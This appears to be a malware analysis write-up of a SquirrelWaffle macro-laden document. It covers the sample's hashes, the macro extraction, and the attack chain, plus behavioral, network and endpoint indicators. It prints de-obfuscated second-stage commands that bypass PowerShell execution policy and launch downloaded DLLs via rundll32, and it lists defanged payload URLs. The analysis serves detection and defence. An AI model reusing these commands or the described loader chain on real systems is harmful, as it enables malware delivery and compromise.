-
SquirrelWaffle has been around for several years. It serves as a loader for secondary payloads which commonly range from banking trojans (i.e. Dridex) to Cobalt Strike.
-
It usually leverages a macro to launch a Powershell script, which launches shellcode in memory, which then downloads and runs the second stage payload (DLL) which functions as the loader.
-
The most common delivery mechanism is via a
.doc
or.xls
file with embedded macro(s).
References
NetSkope - SquirrelWaffle: New Malware Loader Delivering Cobalt Strike and Qakbot
TrendMicro - SquirrelWaffle Exploits ProxyShell and ProxyLogon to Hijack Email Chains
Hash Type | File Hash |
---|---|
MD5 | 6be56f977b6692fb6ce5f94e110664e3 |
SHA1 | f4d5ce35c656e0f156a2ced453a964faabef09fb |
SHA-256 | ae94cd20505f914bba5e612acb80c429c5606a739c0838e3a5f87bfcc7cc8519 |
We start the analysis of this particular sample using TRiD to analyze the file header(s). This confirms it is indeed a .docx
file.
After using olevba
and oledump
to dump the contents of embedded OLE streams, we can see a multitude of macros embedded in this sample.
After exporting these to a text file, they can be further reviewed.
Most of the macros in this sample are long, but harmless. My suspicious is that this is a simple redirection tactic. If we proceed to the macro named Module3
, we can see references to specific Windows directories as well as references to a .ps1
file and a .txt
file.
The visual basic code in the above screenshot has been slightly manually de-obfuscated. It's important to note that two specific objects are referenced here - var_Object.ttt1.Text
and var_Object.ttt2.Text
. Fortunately, our OLE stream extraction tools already pulled these out (see below).
The above shows an obfuscated Powershell script.
If we de-obfuscate and simplify it, we get the above result, which straightforwardly shows web client downloads of at least 5 different DLLs.
If we proceed to ttt2
, we can see another Visual Basic macro that uses Powershell, but this one is responsible for executing the DLLs.
It easily de-obfuscates to the below.
# Running the previously identified Powershell script
Powershell Set-ExecutionPolicy Bypass & %AppData%\\www.ps1
# Executing the DLLs using Windows' built-in DLL launcher.
cmd /c rundll32.exe C:\\ProgramData\\www1.dll
cmd /c rundll32.exe C:\\ProgramData\\www2.dll
cmd /c rundll32.exe C:\\ProgramData\\www3.dll
cmd /c rundll32.exe C:\\ProgramData\\www4.dll
cmd /c rundll32.exe C:\\ProgramData\\www5.dll
Attack Chain
- User downloads
.doc
file and enables macros - Macro named
deutsche
automatically runs. It sets up an event handler to trigger an action any time the user clicks anywhere in the document withPrivate Sub UserForm_Click()
. - Macro named
Module3
runs. Module3
grabs the%USERPROFILE%\%AppData%\Roaming
directory, copies text data (Powershell) from thedeutsche
OLE stream, and translates that to a Powershell script in its newly established staging directory.- Next,
Module3
also copies text data (VBA) from thedeutsche
OLE stream and translates that to a VBA script. - The Powershell script is responsible for downloading 5 DLLs and staging them in the
C:\ProgramData\
directory. - The VBA Script is then responsible for launching the DLLs via Powershell by invoking
rundll32.exe
.
IOCs - Behavioral
IOC | Description |
---|---|
Creation of a www.ps1 file in \AppData\Roaming |
Used for staging the Powershell script to download malicious DLLs. |
Creation of a www.txt file in \AppData\Roaming |
Used for copying contents of malicious visual basic script responsible for launching the DLLs. |
IOCs - Network
URL | Description |
---|---|
hxxps://ghapan[.]com/Kdg73onC3oQ/090921[.]html |
Download location for www1.dll |
hxxps://gruasingenieria[.]pe/LUS1NTVui6/090921[.]html |
Download location for www2.dll |
hxxps://yoowi[.]net/tDzEJ8uVGwdj/130921[.]html |
Download location for www3.dll |
hxxps://chaturanga[.]groopy.com/7SEZBnhMLW/130921[.]html |
Download location for www4.dll |
hxxps://lotolands[.]com/JtaTAt4Ej/130921[.]html |
Download location for www5.dll |
IOCs - Endpoint
IOC | Description |
---|---|
ae94cd20505f914bba5e612acb80c429c5606a739c0838e3a5f87bfcc7cc8519 |
SHA256 for maldoc (dropper) |